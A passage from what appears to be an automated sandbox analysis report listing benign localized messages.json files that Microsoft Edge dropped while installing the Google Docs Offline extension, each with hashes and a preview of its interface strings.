\u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\lt\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1028
                                Entropy (8bit):4.797571191712988
                                Encrypted:false
                                SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                MD5:970544AB4622701FFDF66DC556847652
                                SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\lv\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):994
                                Entropy (8bit):4.700308832360794
                                Encrypted:false
                                SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                MD5:A568A58817375590007D1B8ABCAEBF82
                                SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\ml\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):2091
                                Entropy (8bit):4.358252286391144
                                Encrypted:false
                                SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\mn\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):2778
                                Entropy (8bit):3.595196082412897
                                Encrypted:false
                                SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                Malicious:false
                                Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\mr\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1719
                                Entropy (8bit):4.287702203591075
                                Encrypted:false
                                SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\ms\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):936
                                Entropy (8bit):4.457879437756106
                                Encrypted:false
                                SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                MD5:7D273824B1E22426C033FF5D8D7162B7
                                SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\my\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):3830
                                Entropy (8bit):3.5483353063347587
                                Encrypted:false
                                SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                MD5:342335A22F1886B8BC92008597326B24
                                SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                Malicious:false
                                Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\ne\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1898
                                Entropy (8bit):4.187050294267571
                                Encrypted:false
                                SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\nl\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):914
                                Entropy (8bit):4.513485418448461
                                Encrypted:false
                                SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\no\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):878
                                Entropy (8bit):4.4541485835627475
                                Encrypted:false
                                SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                MD5:A1744B0F53CCF889955B95108367F9C8
                                SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\pa\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):2766
                                Entropy (8bit):3.839730779948262
                                Encrypted:false
                                SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                MD5:97F769F51B83D35C260D1F8CFD7990AF
                                SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                Malicious:false
                                Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\pl\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):978
                                Entropy (8bit):4.879137540019932
                                Encrypted:false
                                SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\pt_BR\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):907
                                Entropy (8bit):4.599411354657937
                                Encrypted:false
                                SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\pt_PT\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):914
                                Entropy (8bit):4.604761241355716
                                Encrypted:false
                                SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                MD5:0963F2F3641A62A78B02825F6FA3941C
                                SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\ro\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):937
                                Entropy (8bit):4.686555713975264
                                Encrypted:false
                                SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                MD5:BED8332AB788098D276B448EC2B33351
                                SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\ru\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1337
                                Entropy (8bit):4.69531415794894
                                Encrypted:false
                                SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                MD5:51D34FE303D0C90EE409A2397FCA437D
                                SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                Malicious:false
                                Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

                                C:\Users\user\AppData\Local\Temp\scoped_dir7332_2049752185\CRX_INSTALL\_locales\si\messages.json

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):2846
                                Entropy (8bit):3.7416822879702547
                                Encrypted:false
                                SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                Malicious:false
